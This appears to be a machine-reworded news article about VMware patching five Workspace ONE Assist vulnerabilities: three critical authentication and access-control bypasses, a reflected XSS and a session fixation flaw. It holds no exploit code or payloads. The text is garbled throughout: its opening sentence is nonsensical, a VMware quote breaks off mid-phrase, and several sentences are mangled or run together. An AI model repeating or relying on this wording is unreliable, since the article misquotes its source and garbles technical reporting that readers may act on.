VMware has patched five security flaws that affect that vulnerability. Workspace ONE Assist Some of the solutions can be abused to bypass authentication and gain elevated permissions.
Topping the list are three critical vulnerabilities tracked as CVE-2022-31685, CVE-2022-31686, and CVE-2022-31687. All shortcomings are rated 9.8 on the CVSS vulnerability scoring system.
CVE-2022-31685 is an authentication bypass flaw that can be exploited by an attacker with network access to VMware Workspace ONE Assist to gain administrative access to the application without requiring authentication.
The virtualization service provider describes CVE-2022-31686 as a “broken authentication method” vulnerability and CVE-2022-31687 as a “broken access control” vulnerability.
“A malicious actor with network access could gain administrative access without requiring authentication to the application” VMware Said In advisories for CVE-2022-31686 and CVE-2022-31687.
Another vulnerability is reflected cross-site scripting (XSS) vulnerability (CVE-2022-31688, CVSS score: 6.4) is due to improper sanitization of user input and can be exploited to inject arbitrary JavaScript code into the target user’s window .
The rounding of the patch is Session fixation vulnerability (CVE-2022-31689, CVSS score: 4.2) This is the result of improper handling of session tokens, VMware said, stating that “a malicious actor who has obtained a valid may be able to authenticate the application using
Dutch-based Reqon security researchers Jasper Westerman, Jan van der Put, Yanick de Pater, and Harm Blankers are credited with discovering and reporting the flaw.
All issues affect and are fixed in VMware Workspace ONE Assist versions 21.x and 22.x. Version 22.10The company also said there is no workaround to address the weakness.